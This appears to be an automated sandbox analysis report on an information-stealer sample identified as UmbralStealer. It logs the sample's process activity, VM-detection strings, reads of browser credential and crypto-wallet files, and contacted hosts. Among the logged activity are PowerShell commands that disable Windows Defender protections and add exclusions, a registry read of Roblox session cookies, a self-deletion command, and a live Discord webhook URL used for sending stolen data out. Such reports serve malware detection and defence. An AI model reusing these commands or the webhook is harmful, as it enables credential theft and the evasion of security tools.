                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -594938s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -594828s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -594716s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -594609s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -594499s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -594388s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -594281s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -594172s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -594063s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -593938s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -593813s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -593688s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -593563s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -593453s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -593342s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -593234s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -593125s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -593008s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -592900s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -592793s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -592688s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -592563s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -592438s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -592313s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -592187s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -592078s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -591969s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -591844s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -591735s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -591610s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -591485s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724 Thread sleep count: 5181 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724 Thread sleep count: 4695 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780 Thread sleep time: -8301034833169293s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968 Thread sleep count: 3148 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972 Thread sleep count: 230 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984 Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080 Thread sleep count: 5066 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8108 Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8084 Thread sleep count: 1151 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544 Thread sleep count: 4683 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524 Thread sleep count: 2908 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612 Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548 Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948 Thread sleep count: 4163 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948 Thread sleep count: 361 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992 Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7980 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                        Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                        Source: zamPeEkHWr.exe, kaS9T.scr.0.dr Binary or memory string: vboxtray
                        Source: kaS9T.scr.0.dr Binary or memory string: vboxservice
                        Source: zamPeEkHWr.exe, kaS9T.scr.0.dr Binary or memory string: qemu-ga
                        Source: kaS9T.scr.0.dr Binary or memory string: vmwareuser
                        Source: zamPeEkHWr.exe, kaS9T.scr.0.dr Binary or memory string: vmusrvc
                        Source: kaS9T.scr.0.dr Binary or memory string: vmwareservice+discordtokenprotector
                        Source: kaS9T.scr.0.dr Binary or memory string: vmsrvc
                        Source: kaS9T.scr.0.dr Binary or memory string: vmtoolsd
                        Source: kaS9T.scr.0.dr Binary or memory string: vmwaretray
                        Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB0357000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmwareservice
                        Source: zamPeEkHWr.exe, 00000000.00000002.2329889878.000001EAAE884000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe Process information queried: ProcessInformation
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe Process token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe'
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe File written: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\zamPeEkHWr.exe"
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe'
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\zamPeEkHWr.exe" && pauseJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Queries volume information: C:\Users\user\Desktop\zamPeEkHWr.exe VolumeInformation
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Lowering of HIPS / PFW / Operating System Security Settings

                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | File written: C:\Windows\System32\drivers\etc\hosts

                        Stealing of Sensitive Information

                        Source: Yara match | File source: zamPeEkHWr.exe, type: SAMPLE
                        Source: Yara match | File source: 0.0.zamPeEkHWr.exe.1eaae570000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.2336242686.000001EAB073D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.2336242686.000001EAB06A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: zamPeEkHWr.exe PID: 7396, type: MEMORYSTR
                        Source: Yara match | File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr, type: DROPPED

                        Source: Yara match | File source: zamPeEkHWr.exe, type: SAMPLE
                        Source: Yara match | File source: 0.0.zamPeEkHWr.exe.1eaae570000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: zamPeEkHWr.exe PID: 7396, type: MEMORYSTR
                        Source: Yara match | File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr, type: DROPPED

                        Source: zamPeEkHWr.exe, 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: Electrum
                        Source: zamPeEkHWr.exe, 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: BytecoinJaxx!com.liberty.jaxx
                        Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB066C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 3C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                        Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB066C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 0C:\Users\user\AppData\Roaming\Ethereum\keystore
                        Source: zamPeEkHWr.exe, 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: Exodus
                        Source: zamPeEkHWr.exe, 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: Ethereum
                        Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB066C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 4C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                        Source: zamPeEkHWr.exe, 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: keystore
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: Yara match | File source: Process Memory Space: zamPeEkHWr.exe PID: 7396, type: MEMORYSTR

                        Remote Access Functionality

                        Source: Yara match | File source: zamPeEkHWr.exe, type: SAMPLE
                        Source: Yara match | File source: 0.0.zamPeEkHWr.exe.1eaae570000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.2336242686.000001EAB073D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.2336242686.000001EAB06A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: zamPeEkHWr.exe PID: 7396, type: MEMORYSTR
                        Source: Yara match | File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr, type: DROPPED

                        Source: Yara match | File source: zamPeEkHWr.exe, type: SAMPLE
                        Source: Yara match | File source: 0.0.zamPeEkHWr.exe.1eaae570000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: zamPeEkHWr.exe PID: 7396, type: MEMORYSTR
                        Source: Yara match | File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr, type: DROPPED
                        MITRE ATT&CK matrix, one row per tactic (the figures in parentheses are the counts shown in the original matrix next to the technique):

                        Tactic | Techniques
                        Reconnaissance | Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                        Resource Development | Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                        Initial Access | Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                        Execution | Windows Management Instrumentation (1); Command and Scripting Interpreter (11); PowerShell (1); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                        Persistence | DLL Side-Loading (1); Registry Run Keys / Startup Folder (12); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                        Privilege Escalation | DLL Side-Loading (1); Process Injection (11); Registry Run Keys / Startup Folder (12); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                        Defense Evasion | File and Directory Permissions Modification (1); Disable or Modify Tools (21); Obfuscated Files or Information (11); Timestomp (1); DLL Side-Loading (1); File Deletion (1); Masquerading (11); Virtualization/Sandbox Evasion (41); Process Injection (11)
                        Credential Access | OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                        Discovery | System Information Discovery (22); Query Registry (1); Security Software Discovery (211); Process Discovery (1); Virtualization/Sandbox Evasion (41); Application Window Discovery (1); Remote System Discovery (11); System Network Configuration Discovery (11); Network Sniffing
                        Lateral Movement | Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                        Collection | Archive Collected Data (1); Data from Local System (2); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                        Command and Control | Ingress Tool Transfer (3); Encrypted Channel (21); Non-Application Layer Protocol (4); Application Layer Protocol (15); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                        Exfiltration | Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                        Impact | Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                        Behavior Graph (ID 1488036; sample: zamPeEkHWr.exe; start date: 05/08/2024; architecture: WINDOWS; score: 100).
                        Contacted hosts: ip-api.com (208.95.112.1, ports 49731, 49738, 80; TUT-ASUS, United States) and ptb.discord.com (162.159.138.232, ports 443, 49740, 49741; CLOUDFLARENETUS, United States).
                        Dropped files: C:\ProgramData\Microsoft\...\kaS9T.scr (PE32); C:\Windows\System32\drivers\etc\hosts (ASCII); C:\Users\user\AppData\...\zamPeEkHWr.exe.log (ASCII); C:\ProgramData\...\kaS9T.scr:Zone.Identifier (ASCII).
                        Signatures on the sample node: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 13 other signatures. On zamPeEkHWr.exe: Suspicious powershell command line found; Found many strings related to Crypto-Wallets (likely being stolen); Self deletion via cmd or bat file; 7 other signatures. On powershell.exe: Loading BitLocker PowerShell Module. On cmd.exe: Uses ping.exe to check the status of other devices and networks.
                        Process tree: zamPeEkHWr.exe started powershell.exe (which started WmiPrvSE.exe and conhost.exe), cmd.exe (which started conhost.exe and PING.EXE), a second powershell.exe (which started conhost.exe) and 9 other processes (conhost.exe x3 and 6 other processes).

                        Source | Detection | Scanner | Label
                        zamPeEkHWr.exe | 82% | ReversingLabs | ByteCode-MSIL.Trojan.UmbralStealer
                        zamPeEkHWr.exe | 100% | Avira | HEUR/AGEN.1307507
                        zamPeEkHWr.exe | 100% | Joe Sandbox ML |

                        Source | Detection | Scanner | Label
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr | 100% | Avira | HEUR/AGEN.1307507
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr | 100% | Joe Sandbox ML |
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr | 82% | ReversingLabs | ByteCode-MSIL.Trojan.UmbralStealer
                        No Antivirus matches
                        No Antivirus matches
                        Source | Detection | Scanner | Label
                        http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
                        http://www.apache.org/licenses/LICENSE-2.0 | 0% | URL Reputation | safe
                        http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
                        http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
                        http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
                        https://contoso.com/License | 0% | URL Reputation | safe
                        https://contoso.com/Icon | 0% | URL Reputation | safe
                        http://crl.m | 0% | URL Reputation | safe
                        http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
                        https://contoso.com/ | 0% | URL Reputation | safe
                        https://nuget.org/nuget.exe | 0% | URL Reputation | safe
                        http://ip-api.com | 0% | URL Reputation | safe
                        https://oneget.orgX | 0% | URL Reputation | safe
                        https://aka.ms/pscore68 | 0% | URL Reputation | safe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                        https://oneget.org | 0% | URL Reputation | safe
                        http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe
                        https://discord.com/api/v10/users/ | 0% | Avira URL Cloud | safe
                        http://ptb.discord.com | 0% | Avira URL Cloud | safe
                        https://go.microsof | 0% | Avira URL Cloud | safe
                        https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
                        https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL | 0% | Avira URL Cloud | safe
                        https://discordapp.com/api/v9/users/ | 0% | Avira URL Cloud | safe
                        http://crl.microsoK | 0% | Avira URL Cloud | safe
                        https://go.microsoft.cogDy | 0% | Avira URL Cloud | safe
                        https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N | 0% | Avira URL Cloud | safe
                        https://github.com/Blank-c/Umbral-Stealer | 0% | Avira URL Cloud | safe
                        http://ip-api.com/json/?fields=225545P | 0% | Avira URL Cloud | safe
                        https://ptb.discord.com | 0% | Avira URL Cloud | safe
                        http://ip-api.com/json/?fields=225545 | 0% | Avira URL Cloud | safe
                        https://go.m | 0% | Avira URL Cloud | safe
                        http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806- | 0% | Avira URL Cloud | safe
                        http://crl.micros | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ptb.discord.com | 162.159.138.232 | true | true | | unknown
ip-api.com | 208.95.112.1 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL | true | Avira URL Cloud: safe | unknown
